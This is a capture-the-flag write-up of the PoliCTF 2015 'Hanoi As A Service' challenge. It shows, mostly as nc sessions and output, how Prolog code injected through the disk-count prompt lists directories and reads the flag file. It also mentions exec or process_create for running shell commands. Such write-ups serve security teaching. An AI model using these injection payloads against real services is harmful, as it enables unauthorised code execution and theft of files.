Jul 12, 2015 • Abstract

Hanoi As A Service, Pwnable 50

One of the easiest challenges of PoliCTF 2015 and the first we solved. The challenge’s description pointed us to “haas.polictf.it 80”. Netcating in we found a Tower of Hanoi server:

host$ nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
3
* Move top disk from a to b
* Move top disk from a to c
* Move top disk from b to c
* Move top disk from a to b
* Move top disk from c to a
* Move top disk from c to b
* Move top disk from a to b

Can we get an error? Let’s try ‘-1’:

host$ nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
-1
ERROR: Prolog initialisation failed:
ERROR: Out of local stack

Ah! Prolog, I knew there was a point to studying it back in college. Can we inject some code?

host:john-pastry-shop tpc$ nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
1),write('hello world'
* Move top disk from a to b
hello world

So we can inject commands. Next we googled for any and all Prolog commands that might be useful. ‘1),listing,write('hello'’ displays the entire prolog database, but there is nothing really useful there. Instead we can have a look at the files using: ‘1),directory_files({dir},X),write(X’, until we find the flag:

host$ nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
1),directory_files('home/ctf/haas',X),write(X
* Move top disk from a to b
[haas-proxy.py,..,jhknsjdfhef_flag_here,haas,.]

Now we know were the flag is we can print off the ascii:

host:john-pastry-shop tpc$ nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
1),open('/home/ctf/haas/jhknsjdfhef_flag_here',read,Str),read_line_to_codes(Str,X),write(X
* Move top disk from a to b
[102,108,97,103,123,80,114,48,103,114,97,109,109,49,110,103,95,105,110,95,108,48,103,49,99,95,49,115,95,99,48,48,108,125]

which https://paulschou.com/tools/xlate/ tells us encodes: ‘flag{Pr0gramm1ng_in_l0g1c_1s_c00l}’.

Executing shell commands or even opening a shell would have been possible with Prologs ‘exec’ or ‘process_create’ commands, but that seemed like overkill in this situation.